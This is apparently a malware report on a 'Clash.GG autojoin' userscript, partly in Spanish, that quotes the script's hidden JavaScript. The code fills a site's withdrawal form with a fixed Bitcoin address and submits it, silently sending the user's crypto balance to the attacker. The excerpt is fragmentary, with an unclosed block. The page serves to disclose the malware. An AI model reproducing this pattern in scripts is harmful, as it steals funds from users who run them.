Clash.GG AUTOJOIN FREE BATTLE Script - + Text to Link ha sido denunciado 17/12/2024 como Software malicioso
Hidden code to send CRYPTO to an address
// Perform
function performSequence() {
// Click on option
setTimeout(() => clickElementByText('span', 'Bitcoin'), 300);
// 1
setTimeout(() => inputText('.css-1ljxsvl.e8bzvmc0', '3NrDGFzNxKGH4jKxrfQTDXBTKyhJy11yoL'), 600);
// checkbox
setTimeout(() => clickElement('.css-1jrx41j.e8bzvmc0'), 800);
// Click
setTimeout(() => {
const elements = document.querySelectorAll('.css-qifdi4');
if (elements.length > 1) {
}, 1000);
// Click on the final button
setTimeout(() => clickElement('.css-1c5xwju'), 1200);
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